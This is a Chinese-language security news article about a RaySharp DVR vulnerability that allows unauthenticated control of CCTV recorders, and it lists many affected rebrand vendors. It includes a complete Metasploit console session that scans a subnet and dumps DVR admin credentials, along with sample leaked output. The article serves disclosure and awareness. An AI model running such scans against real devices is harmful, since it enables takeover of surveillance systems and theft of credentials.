DVR漏洞使黑客輕松控制CCTV攝像機(MSF已更新模塊)
安全研究人員稱,CCTV眾多視頻錄制設備正面臨被黑風險,黑客可以監控、復制和刪除視頻流。
安全人員補充到,除非系統安裝了合適的固件,否則DVR平臺固件都能成為攻擊者向這些網絡視頻設備進行攻擊的切入點。這些易受攻擊的CCTV設備是總部位于廣東的RaySharp公司生產的。
攻擊上周首先被發現,黑客可以通過DVR 9000端口發送命令而無須任何認證,這樣黑客就可直接進入到DVR的web控制面板。更悲催的是DVR通常支持UPnP(通用即插即用,可以通過網絡驅動設備),網上就能實施控制。此外,RaySharp DVR還以明文形式存儲用戶名和密碼。
事實上,受影響的廠商還包括:Swann, Lorex, URMET, KGuard, Defender, DEAPA/DSP Cop, SVAT, Zmodo, BCS, Bolide, EyeForce, Atlantis, Protectron, Greatek, Soyo, Hi-View, Cosmos, and J2000等等。掃描顯示,全世界150多個國家超過58000視頻設備可被攻擊。
metasploit下已有了相關模塊:
$ sudo -s -E
# msfconsole
msf> use auxiliary/scanner/misc/raysharp_dvr_passwords
msf auxiliary(raysharp_dvr_passwords) > set RHOSTS 192.168.0.0/24
msf auxiliary(raysharp_dvr_passwords) > set THREADS 256
msf auxiliary(raysharp_dvr_passwords) > run
[+] 192.168.0.153:9000 (user='admin' pass='1234546') mac=00-23-63-63-63-63 version=V2.1-20110716
附:
RaySharp安聯銳視,是全球領先的數字視頻監控解決方案提供商,以珠海為總部,營銷網絡覆蓋全球近百個國家和地區。安聯銳視在中國先后為北京天安門廣場、2008年北京奧運會場館、深圳國際會展中心、中山市政府和澳門大學橫琴校區等數百萬企事業單位、商業機構、公共事業、政府機關和家庭社區提供數字監控服務。